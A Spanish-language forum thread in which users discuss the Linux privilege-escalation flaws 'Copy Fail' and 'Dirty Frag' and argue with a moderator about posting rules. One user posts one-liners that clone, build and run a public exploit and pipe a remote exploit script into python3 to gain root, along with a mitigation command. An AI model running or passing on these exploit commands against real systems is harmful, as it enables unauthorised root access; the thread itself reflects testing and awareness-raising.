Linux Linux tiene un problema serio (Vulnerabilidad Copy Fail).

MELERIX

Fanático
Se incorporó
30 Diciembre 2013
Mensajes
1.894


EDIT: aquí pongo la información del video para que no haya más llantos xD

Descubren cómo un exploit de apenas unas líneas permite escalar privilegios a root en múltiples distribuciones desde 2017, sin modificar archivos en disco y siendo extremadamente difícil de detectar. En el video se analiza su impacto real en servidores, contenedores y entornos cloud, cómo funciona a nivel de memoria y por qué representa una de las fallas más peligrosas de los últimos años.

más info en: https://copy.fail/

y por cierto estás vulnerabilidades van de la mano con Dirty Frag: https://github.com/V4bel/dirtyfrag y Dirty Pipe: https://dirtypipe.cm4all.com/
 
Última modificación:

MELERIX

Fanático
Se incorporó
30 Diciembre 2013
Mensajes
1.894
Pero ya con el titulo genera debate cuando en realidad el problema ya está parchado y bien manejado.

Así que cualquier admin hará su update o deshabilitara o configurará los modulos necesarios para mantener la seguridad y seguimos.

Grave fue el condoro de Crowdstrike, pero esa es otra historia.

si el problema es mas que nada para la gente comun, y maquinas con versiones no actualizadas de Linux o repositorios sobre lo mismo, por eso no está demas informar.

ya que no todo el mundo está pendiente de noticias de este tipo, ni de blogs de seguridad informatica o de Linux.
 
Upvote 0

Gsus

Miembro Regular
Se incorporó
19 Agosto 2022
Mensajes
54
si el problema es mas que nada para la gente comun, y maquinas con versiones no actualizadas de Linux o repositorios sobre lo mismo, por eso no está demas informar.

ya que no todo el mundo está pendiente de noticias de este tipo, ni de blogs de seguridad informatica o de Linux.
Y por otro lado lo mas sorprendente de todo es que el bug es del 2017 a ningún "humano" se le ocurrio vulnerar esta falla, fue una IA que se dió cuenta.
 
Upvote 0

MELERIX

Fanático
Se incorporó
30 Diciembre 2013
Mensajes
1.894
Y por otro lado lo mas sorprendente de todo es que el bug es del 2017 a ningún "humano" se le ocurrio vulnerar esta falla, fue una IA que se dió cuenta.

sí, aunque no por sí solo, fue Taeyang Lee quien la descubrió con asistencia de la IA tras hacer escaneo y auditoria de código, aunque no dijeron cual IA, pero claramente debe ser la de Mythos xD ya que fue a través del grupo Xint, igual hace unas semanas se comentaba en los medios que habían encontrado unas 500 vulnerabilidades en Linux y otros SO con Opus 4.6.
 
Última modificación:
Upvote 0

Pato

ADMIN
Miembro del Equipo
ADMIN
Se incorporó
27 Octubre 2010
Mensajes
19.537
quieren que yo les haga un resumen por cuenta mia? Oo par que? no entiendo, si en el video está explicado super practico y facil.

Porfado.

Moveré todos los temas cuyo post inicial ses solo un link externo. No todos quieren ver un video, no todos quieren salir del sitio para revisarr otro, etc.

Si nos cuentas de que tratan tus link, quizás se arme un conversa o nod animemos a ver el video. Pero así, no.
 
Upvote 0

MELERIX

Fanático
Se incorporó
30 Diciembre 2013
Mensajes
1.894
Porfado.

Moveré todos los temas cuyo post inicial ses solo un link externo. No todos quieren ver un video, no todos quieren salir del sitio para revisarr otro, etc.

Si nos cuentas de que tratan tus link, quizás se arme un conversa o nod animemos a ver el video. Pero así, no.

sinceramente no pensé que publicar un simple video corto que resume el tema y acompañado de los respectivos enlaces con información detallada para quienes les interes profundizar mas les fuese a molestar tanto xD

ya que el video es breve y fácil de entender (incluso para quienes no saben de Linux), además el video se puede ver dentro del mismo foro de capa9 sin salir de esté, ya que el mismo foro lo pone como video incrustado.

además, como ya lo comenté en otro mensaje, mi idea fue solo compartir la información nada más, para quienes le interese y la quieran ver o leer, y no necesariamente para que se tenga que armar una conversa, discusión o debate al respecto, ya que esto último yo personalmente considero que es algo opcional y que se puede o no dar de forma voluntaria y automática por quienes realmente se interesen del tema o sepan del tema.

pero no que esto se sienta como que estén forzando o condicionando a los usuarios que cada cosa que alguien publique en el foro tenga que si o si forzar a otros a hacer un debate/conversa/discusión al respecto.

PD: le agregue una breve info al video en la pagina 1, para que no haya más llantos xD
 
Última modificación:
Upvote 0

Harima

Pegao al tarro
Se incorporó
15 Mayo 2008
Mensajes
4.040
por lo menos en fedora44 no funciona out of the box el exploit en python

1778444894055.png
 
Upvote 0

Harima

Pegao al tarro
Se incorporó
15 Mayo 2008
Mensajes
4.040
de ahí te subo la fedora 44 pero por mientras, tuve que instalar gcc en las tres sosi

Bash:
git clone [URL]https://github.com/V4bel/dirtyfrag.git[/URL] && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Rocky
OS: Rocky Linux 10.1 (Red Quartz) x86_64

1778793539404.png
Fedora 43
OS: Fedora Linux 43 x86_64
1778793528588.png

Debian
OS: Debian GNU/Linux 13 (trixie) x86_64
1778793515954.png


Aplique update y el parche y se abren de pata igual

Bash:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
 
Upvote 0

Harima

Pegao al tarro
Se incorporó
15 Mayo 2008
Mensajes
4.040
probé el copy fail en esas también

Bash:
curl https://copy.fail/exp | python3 && su

1778797509836.png

1778797517836.png

1778797526564.png


se abrieron de pata las 3
 
Upvote 0

MELERIX

Fanático
Se incorporó
30 Diciembre 2013
Mensajes
1.894
por cierto, respecto al tema de Dirty Frag, justo acaba de salir un video al respecto...



Una nueva vulnerabilidad de escalada local de privilegios afecta a prácticamente todas las distros de Linux: Ubuntu, RHEL, CentOS, Fedora, openSUSE, AlmaLinux… Si un atacante consigue acceso con un usuario normal, puede convertirse en root combinando dos vulnerabilidades del kernel. Y ojo, porque aunque hayas parcheado CopyFail, esta es diferente y necesita su propio parche.
 
Última modificación:
Upvote 0
Subir